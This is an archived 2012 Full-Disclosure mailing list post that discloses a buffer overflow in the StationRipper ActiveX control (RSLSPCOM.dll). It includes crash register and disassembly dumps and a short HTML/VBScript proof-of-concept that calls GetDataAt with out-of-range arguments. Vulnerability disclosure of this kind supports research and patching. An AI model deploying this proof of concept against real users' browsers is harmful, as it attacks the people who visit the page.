lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CADe7mMdKbYmf8c==6oz5w9XE3+78wbCBa0yQWvoC4HNjX=ggtg@mail.gmail.com>
Date: Thu, 19 Jul 2012 11:22:57 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: stationripper ActiveX (RSLSPCOM.dll) BoF PoC

Exploit Title: stationripper ActiveX (RSLSPCOM.dll) BoF PoC
Date: July 19, 2012
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: www.stationripper.com
Version: 2.98.3/1
Tested on: windows XP SP3

---------------------------------------------------------------------------------------
cheers to awesome hippie flaw hunter
---------------------------------------------------------------------------------------
Class SSLDataContainer
GUID: {E52990C2-7CED-4756-9B3B-6188A5B41704}
GetDataAt
Function GetDataAt (
 	ByVal lPos  As Long ,
 	ByVal lHowMuch  As Long
)  As String

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EIP 003B1191
EAX 00000000
EBX 003BB3BC -> 003B3904
ECX 003D2120 -> BAADF00D
EDX 00000000
EDI FFFFFFFF
ESI 00000000
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED64 -> 003BB3BC


Block Disassembly:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3B1181	MOV DL,AL
3B1183	AND DL,F
3B1186	SHL DL,2
3B1189	OR [EBP+13],DL
3B118C	SHR AL,4
3B118F	MOV DL,AL
3B1191	MOV AL,[EDI]	  <--- CRASH
3B1193	MOV BL,AL
3B1195	AND BL,3
3B1198	SHL BL,4
3B119B	OR DL,BL
3B119D	SHR AL,2
3B11A0	MOV [EBP+F],AL
3B11A3	MOV EAX,[EBP-4]
3B11A6	SUB [EBP-8],EAX


ArgDump:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EBP+8	003D2120 -> BAADF00D
EBP+12	FFFFFFFF
EBP+16	00000001
EBP+20	00000005
EBP+24	00000001
EBP+28	00000000

<html>
Exploit
<object classid='clsid:E52990C2-7CED-4756-9B3B-6188A5B41704' id='xpl' ></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Ratajik Software\StationRipper\RSLSPCOM.dll"
prototype  = "Function GetDataAt ( ByVal lPos As Long ,  ByVal
lHowMuch As Long ) As String"
memberName = "GetDataAt"
progid     = "SSLHIJACKCLIENTCOMLib.SSLDataContainer"
argCount   = 2

arg1=-1
arg2=1

xpl.GetDataAt arg1 ,arg2

</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ